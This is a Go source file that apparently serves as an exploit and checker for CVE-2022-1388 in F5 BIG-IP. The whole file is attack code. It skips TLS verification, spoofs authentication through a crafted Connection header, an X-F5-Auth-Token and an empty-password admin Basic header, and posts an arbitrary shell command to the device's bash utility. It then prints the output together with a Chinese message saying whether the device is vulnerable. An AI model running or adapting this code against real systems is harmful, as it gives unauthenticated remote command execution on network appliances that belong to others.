CVE-2022-1388.go

package main

import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"net/http"
	"strings"
)

func Cve_2022_1388() {
	tr := &http.Transport{
		TLSClientConfig: &tls.Config{
			InsecureSkipVerify: true,
		},
	}

	client := &http.Client{Transport: tr}
	//client := &http.Client{Timeout: time.Second * 10}
	req, err := http.NewRequest("POST", url+filepath1, strings.NewReader("{\"command\":\"run\",\"utilCmdArgs\":\"-c "+c+"\"}"))

	if err != nil {

	}
	req.Header.Add("Accept-Encoding", "gzip, deflate")
	req.Header.Add("Accept", " */*")
	req.Header.Add("Connection", "close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host")
	req.Header.Add("Content-type", "application/json")
	req.Header.Add("X-F5-Auth-Token", "anything")
	req.Header.Add("Authorization", "Basic YWRtaW46")
	req.Header.Add("Content-Length", "42")
	resp, err := client.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer resp.Body.Close()
	body, err1 := ioutil.ReadAll(resp.Body)
	if err1 != nil {
		fmt.Println(err1)
		return
	}
	if resp.StatusCode == 200 {
		fmt.Println("StatusCode:", resp.StatusCode, "CVE-2022-1388漏洞存在")
		fmt.Printf("%s\n", c)
		fmt.Println(string(body))
	} else {
		fmt.Println("StatusCode:", resp.StatusCode, "CVE-2022-1388漏洞不存在")
	}

}